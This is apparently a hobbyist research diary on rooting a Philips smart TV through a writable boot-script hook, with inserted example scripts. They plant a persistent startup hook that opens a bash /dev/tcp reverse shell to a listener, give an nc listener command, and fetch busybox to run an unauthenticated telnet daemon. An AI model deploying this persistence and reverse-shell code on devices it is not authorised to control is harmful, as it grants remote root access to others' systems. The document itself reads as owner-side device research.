Philips_TV/research/28_apr_2020.md


28 April 2020

We start off the day by picking up where we left off last time and continuing with the stack overflow exploit. More people in our community/group are getting interested in what we are trying to do, so we get some new eyes on the subject.

First shell command

HoLLy wanted me to experiment more with the accessLocalStorage function and see if we could do anything useful with it. It turns out we have write permission to one other directory besides /tmp (and maybe some others that are less important right now): /3rd_rw. At first glance it did not seem to give us any more of a foothold, as there is nothing of importance in it. Going through /basic/autorun.sh a few more times, I found one reference to /3rd_rw: if /3rd_rw/browser_engine/global_env_setup.ini exists, the script executes it. Lucky for us, this file does not even exist, so there is no harm in trying. Just create the file in that directory and put a command in it. We tried touching a file to see if it ran during boot, and it did!

Being unsure whether the whole boot script sequence would stop if something errored in the new script, we made sure to start everything as a background task and on a timer long enough to fix the error if something went wrong. After some fiddling around we got basic bash with a reverse shell to run on startup (30 seconds after boot, to ensure the TV had connected to the network). We had some issues getting that to work because the TV is the one that opens the connection to my PC to establish the reverse shell, so the listener on the PC has to be reachable and already waiting before the TV dials out.
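The boot hook as a script, added here as an example and not the author's own file. It assumes what the page reports (that /basic/autorun.sh executes /3rd_rw/browser_engine/global_env_setup.ini when present, and that bash is available on the TV) plus a listener at the made-up address 192.0.2.10:4444. The payload is wrapped in a detached, silenced background subshell so that a broken hook cannot stall the rest of autorun.sh, the dial-out is delayed so the network is up, and the installer refuses to overwrite an existing file and syntax-checks the hook before trusting it to a reboot.

```shell
#!/bin/sh
# Added example, not the author's script: builds and installs the boot hook.
# Assumptions: /basic/autorun.sh runs /3rd_rw/browser_engine/global_env_setup.ini
# when it exists (as the page reports), bash exists on the TV, and the
# listener host/port passed in are reachable from the TV.

# Print the hook. $1 = listener host, $2 = listener port, $3 = delay in seconds
# (default 30, so the TV is on the network before it dials out).
make_boot_hook() {
    host="$1"; port="$2"; delay="${3:-30}"
    cat <<EOF
#!/bin/sh
# Runs from /basic/autorun.sh at boot. The whole payload lives in a detached
# background subshell with output discarded, so a failure here cannot stall
# the rest of the boot sequence.
(
    sleep ${delay}
    # bash /dev/tcp reverse shell back to the listener
    exec bash -c 'exec bash -i >& /dev/tcp/${host}/${port} 0>&1'
) >/dev/null 2>&1 &
EOF
}

# Install the hook under $4 (default /3rd_rw/browser_engine). Refuses to
# clobber an existing file: a real one there would otherwise be replaced silently.
install_boot_hook() {
    dir="${4:-/3rd_rw/browser_engine}"
    hook="$dir/global_env_setup.ini"
    if [ -e "$hook" ]; then
        echo "refusing to overwrite existing $hook" >&2
        return 1
    fi
    mkdir -p "$dir" || return 1
    make_boot_hook "$1" "$2" "$3" > "$hook" || return 1
    sh -n "$hook" || return 1      # syntax-check before trusting it to a reboot
    chmod 755 "$hook"
}

# On the attacker PC, before rebooting the TV:   nc -lvp 4444
# Deploy on the TV (uncomment):
# install_boot_hook 192.0.2.10 4444 30
```

The listener must be started before the reboot and must be reachable on the port the hook dials; a host firewall that drops inbound connections on the PC shows up exactly as "the TV never connects".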

Shell upgrade

The current environment is limited and stripped down, so we do not even know which user we are running as yet. We have wget, but without SSL support. I ended up downloading busybox and sending it over to upgrade to a better shell. Busybox worked flawlessly, and we upgraded the reverse shell to start telnet and later made a login script that sets up some path variables on login. Note that we had to mount /dev/pts to use telnet, because telnetd needs to spawn a new pty for every session.

[screenshot: neofetch output]
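The shell upgrade as a script, added as an example rather than the author's own. It assumes a static busybox build served over plain HTTP from the made-up address 192.0.2.10 (the TV's wget has no TLS) and a writable install directory under /3rd_rw, which the page reports is writable. It mounts devpts only if it is not already mounted, starts busybox telnetd, and gives each session a login script that puts the busybox applets first on PATH.

```shell
#!/bin/sh
# Added example, not the author's scripts: busybox-based shell upgrade.
# Assumed: BB_URL serves a static busybox for the TV's CPU, and BB_DIR is
# on the writable /3rd_rw partition the page describes.
BB_URL="${BB_URL:-http://192.0.2.10:8000/busybox}"
BB_DIR="${BB_DIR:-/3rd_rw/bb}"

# Is devpts mounted on /dev/pts? Reads a mounts table ($1, default
# /proc/mounts) so the check can also be run against a constructed table.
devpts_mounted() {
    mounts="${1:-/proc/mounts}"
    awk '$3 == "devpts" && $2 == "/dev/pts" { found = 1 } END { exit !found }' "$mounts"
}

# Print the login script telnetd hands to each session: busybox applets
# first on PATH, then the TV's own directories, then an interactive shell.
make_login_script() {
    bbdir="$1"
    cat <<EOF
#!${bbdir}/bin/sh
# login shell for telnet sessions
export PATH=${bbdir}/bin:/usr/sbin:/usr/bin:/sbin:/bin
export HOME=/tmp
export TERM=vt100
export PS1='tv\$ '
exec ${bbdir}/bin/sh -i
EOF
}

# Fetch busybox over plain HTTP and install every applet as a symlink.
fetch_busybox() {
    mkdir -p "$BB_DIR/bin" || return 1
    wget -O "$BB_DIR/bin/busybox" "$BB_URL" || return 1
    chmod 755 "$BB_DIR/bin/busybox"
    "$BB_DIR/bin/busybox" --install -s "$BB_DIR/bin"
}

# telnetd needs a pty per session: mount devpts once, then listen on 23 and
# spawn the login script (run in the background from the reverse shell).
start_telnetd() {
    if ! devpts_mounted; then
        mkdir -p /dev/pts
        mount -t devpts devpts /dev/pts || return 1
    fi
    make_login_script "$BB_DIR" > "$BB_DIR/login.sh" || return 1
    chmod 755 "$BB_DIR/login.sh"
    "$BB_DIR/bin/busybox" telnetd -p 23 -l "$BB_DIR/login.sh"
}

# Run on the TV from the reverse shell (uncomment):
# fetch_busybox && start_telnetd
```

Once telnetd is up, the bash reverse shell is only needed as a fallback; `telnet <tv-ip>` from the PC gives a proper pty, job control and a sane PATH.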

TV server

After dealing with Java issues we got a Minecraft 1.7.3 beta server to run. This is by far the most inefficient way of testing performance.

Future work

Currently we cannot run Crysis (yet), as we need to find out how to render to the TV screen as well as compile the missing libraries.